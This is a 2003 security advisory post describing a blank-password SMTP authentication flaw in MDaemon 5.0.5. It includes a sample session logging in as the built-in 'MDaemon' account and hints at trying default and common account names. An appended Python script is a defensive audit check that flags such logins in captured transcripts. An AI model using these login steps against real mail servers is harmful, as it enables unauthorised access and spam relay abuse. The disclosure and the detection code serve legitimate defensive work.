MDaemon 5.0.5 authentication vulnerability

From: Buckaroo Banzai (buckaner0at_private)
Date: Fri Aug 08 2003 - 16:59:59 PDT


    Hello,
    
    There is a security problem in MDaemon 5.0.5 (maybe other versions 
    affected as well) regarding SMTP authentication.
    
    
    Blank password authenticates any valid user:
    
    For primary domain:
    User:		VALIDUSER	or	VALIDUSERat_private
    Password:	blank password
    
    For secondary domains:
    User:		VALIDUSERat_private
    Password:	blank password
    
    
    Using this vulnerability, spammers could abuse the server even if relay control is 
    properly configured. To abuse the server there is no need to get the 
    userlist.dat and decode the well-known weak encryption of MDaemon 5.0.6 
    and before (base64 encoded password plus one offset for each character 
    (1 byte)).
    
    
    If a valid user is required you could always use the built-in account "MDaemon" and 
    the default password (see references) or blank password. You could also try 
    with well-known accounts (administrator, webmaster, info, spam, admin, etc.)
    
    
    Sample session:
    
    220 xxx.com ESMTP MDaemon 5.0.5; Sat, 02 Aug 2003 00:51:06 +0200
    EHLO localhost
    250-xxx.com Hello localhost, pleased to meet you
    250-ETRN
    250-AUTH LOGIN CRAM-MD5
    250-8BITMIME
    250 SIZE 0
    AUTH LOGIN
    334 VXNlcm5hbWU6               (334 Username:)
    TURhZW1vbg==                      (MDaemon)
    334 UGFzc3dvcmQ6               (334 Password:)
                                                 (blank password)
    235 Authentication successful
    
    
    
    Buckaroo Banzai
    
    P.S.: The bug has been submitted to ALT-N
    
    
    References: related security issues regarding MDaemon 5
    -------------------------------------------------------
    http://www.securityfocus.com/bid/4689
    http://www.securityfocus.com/bid/4686
    http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0057.html
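
Added example, not part of the original post: a small audit check that walks a captured SMTP session and reports any AUTH LOGIN exchange where the server answered 235 to an empty password, which is the behaviour the sample session shows. The "S:"/"C:" direction prefixes, the host name and the function names are assumptions of this example, and the capture is constructed.

```python
import base64

# Constructed capture modelled on the sample session in the post. The "S:"/"C:"
# direction prefixes and the host name are assumptions of this example.
SAMPLE = """\
S: 220 mail.example ESMTP
C: EHLO localhost
S: 250-AUTH LOGIN CRAM-MD5
S: 250 SIZE 0
C: AUTH LOGIN
S: 334 VXNlcm5hbWU6
C: TURhZW1vbg==
S: 334 UGFzc3dvcmQ6
C:
S: 235 Authentication successful
"""

def _b64(token):
    """Decode one base64 AUTH LOGIN token; None if it is not valid base64."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "replace")
    except ValueError:
        return None

def find_blank_password_logins(transcript):
    """Return the usernames the server accepted (235) with an empty password."""
    hits = []
    prompt = user = password = None
    for raw in transcript.splitlines():
        side, _, rest = raw.partition(":")
        rest = rest.strip()
        if side == "S":
            code, arg = rest[:3], rest[4:]
            if code == "334":
                # The challenge text says which field the client sends next.
                prompt = (_b64(arg) or "").lower()
                continue
            if code == "235" and user is not None and password == "":
                hits.append(user)
            prompt = user = password = None  # any other reply ends the exchange
        elif side == "C" and prompt:
            if prompt.startswith("username"):
                user = _b64(rest)
            elif prompt.startswith("password"):
                password = _b64(rest)
            prompt = None
    return hits

if __name__ == "__main__":
    print(find_blank_password_logins(SAMPLE))
```

The check only covers the prompted AUTH LOGIN form shown in the post; a username sent as an initial response on the AUTH line, or CRAM-MD5, is outside its scope.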
    


